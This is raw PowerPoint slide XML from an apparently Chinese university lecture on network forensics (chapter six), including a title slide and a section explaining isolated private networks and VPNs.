            <a:ext cx="990623" cy="706462"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 997821 w 1320830"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 941949"/>
              <a:gd name="connsiteX1" fmla="*/ 1320830 w 1320830"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 941949"/>
              <a:gd name="connsiteX2" fmla="*/ 317439 w 1320830"/>
              <a:gd name="connsiteY2" fmla="*/ 941949 h 941949"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1320830"/>
              <a:gd name="connsiteY3" fmla="*/ 941949 h 941949"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1320830"/>
              <a:gd name="connsiteY4" fmla="*/ 936720 h 94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830" h="941949">
                <a:moveTo>
                  <a:pt x="997821" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1320830" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="317439" y="941949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="941949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="936720"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="A6A6A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3" name="任意多边形 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="268196" y="3844977"/>
            <a:ext cx="1810306" cy="1301936"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1823461 w 2413741"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1735915"/>
              <a:gd name="connsiteX1" fmla="*/ 2413741 w 2413741"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1735915"/>
              <a:gd name="connsiteX2" fmla="*/ 564595 w 2413741"/>
              <a:gd name="connsiteY2" fmla="*/ 1735915 h 1735915"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 2413741"/>
              <a:gd name="connsiteY3" fmla="*/ 1735915 h 1735915"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 2413741"/>
              <a:gd name="connsiteY4" fmla="*/ 1711802 h 17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741" h="1735915">
                <a:moveTo>
                  <a:pt x="1823461" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2413741" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="564595" y="1735915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1735915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1711802"/>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4" name="任意多边形 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4756278"/>
            <a:ext cx="523886" cy="387222"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 543196 w 698514"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 516296"/>
              <a:gd name="connsiteX1" fmla="*/ 698514 w 698514"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 516296"/>
              <a:gd name="connsiteX2" fmla="*/ 148541 w 698514"/>
              <a:gd name="connsiteY2" fmla="*/ 516296 h 516296"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 698514"/>
              <a:gd name="connsiteY3" fmla="*/ 516296 h 516296"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 698514"/>
              <a:gd name="connsiteY4" fmla="*/ 509934 h 5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514" h="516296">
                <a:moveTo>
                  <a:pt x="543196" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="698514" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148541" y="516296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="516296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="509934"/>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5" name="斜纹 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2767496"/>
            <a:ext cx="2295525" cy="2154960"/>
          </a:xfrm>
          <a:prstGeom prst="diagStripe">
            <a:avLst>
              <a:gd name="adj" fmla="val 75545"/>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6" name="任意多边形 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3557572"/>
            <a:ext cx="834983" cy="783853"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 789260 w 1113310"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1045137"/>
              <a:gd name="connsiteX1" fmla="*/ 1113310 w 1113310"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1045137"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1113310"/>
              <a:gd name="connsiteY2" fmla="*/ 1045137 h 1045137"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1113310"/>
              <a:gd name="connsiteY3" fmla="*/ 740930 h 1045137"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1113310" h="1045137">
                <a:moveTo>
                  <a:pt x="789260" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1113310" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1045137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="740930"/>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7" name="任意多边形 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="-5565"/>
            <a:ext cx="1053821" cy="989291"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1025302 w 1405095"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1319055"/>
              <a:gd name="connsiteX1" fmla="*/ 1405095 w 1405095"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1319055"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1405095"/>
              <a:gd name="connsiteY2" fmla="*/ 1319055 h 1319055"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1405095"/>
              <a:gd name="connsiteY3" fmla="*/ 962518 h 1319055"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1405095" h="1319055">
                <a:moveTo>
                  <a:pt x="1025302" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1405095" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1319055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="962518"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF">
              <a:lumMod val="8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 name="Text Box 197"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="6673215" y="4335145"/>
            <a:ext cx="2014855" cy="320675"/>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FF0517"/>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500" tIns="36750" rIns="73500" bIns="36750">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defTabSz="822960">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1620" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>德才兼备 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1620" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1620" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文武双全</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2119610" y="1343277"/>
            <a:ext cx="1929765" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第六章</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 网络取证</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>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1169333" y="1888299"/>
            <a:ext cx="3829973" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="003466"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2288290" y="3795886"/>
            <a:ext cx="1441420" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>主讲教师</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">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accent6">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>刘佳</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="文本框 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819027" y="4122277"/>
            <a:ext cx="2698175" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>所属系部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：网络与信息安全学院</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="0"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286500" y="2323465"/>
            <a:ext cx="2787650" cy="2012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40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20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="49" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="490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5400"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="54" presetID="2" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">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cBhvr additive="base">
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="57" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>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250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="60" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="61" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="62" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5900"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="63" presetID="22" presetClass="entr" presetSubtype="8"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ipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="6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7" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="18" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="23" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="24" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="25" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="26" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="27" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="19" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="20" grpId="0"/>
      <p:bldP spid="3" grpId="0"/>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6.1.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>专用网络取证</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1275606"/>
            <a:ext cx="7165712" cy="3023235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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从应用和连接方式来看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>专用网络有两类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：一类是与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>公网完全隔离</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的专用网络，这类专用网络具有物理边界，例如：公安网、军网、铁路网等，以及一些特殊的单位内部网。另一类是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>虚拟专用网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(Virtual Private Network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，简称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VPN)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，指的是在公用网络上建立专用网络的技术。其之所以称为虚拟网，主要是因为整个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络的任意两个节点之间的连接并没有传统专网所需的端到端的物理链路，而是架构在公用网络服务商所提供的网络平台，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ATM(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>异步传输模式〉、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Frame Relay (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>帧中继</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等之上的逻辑网络，用户数据在逻辑链路中传输。它涵盖了跨共享网络或公共网络的封装、加密和身份验证链接的专用网络的扩展。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
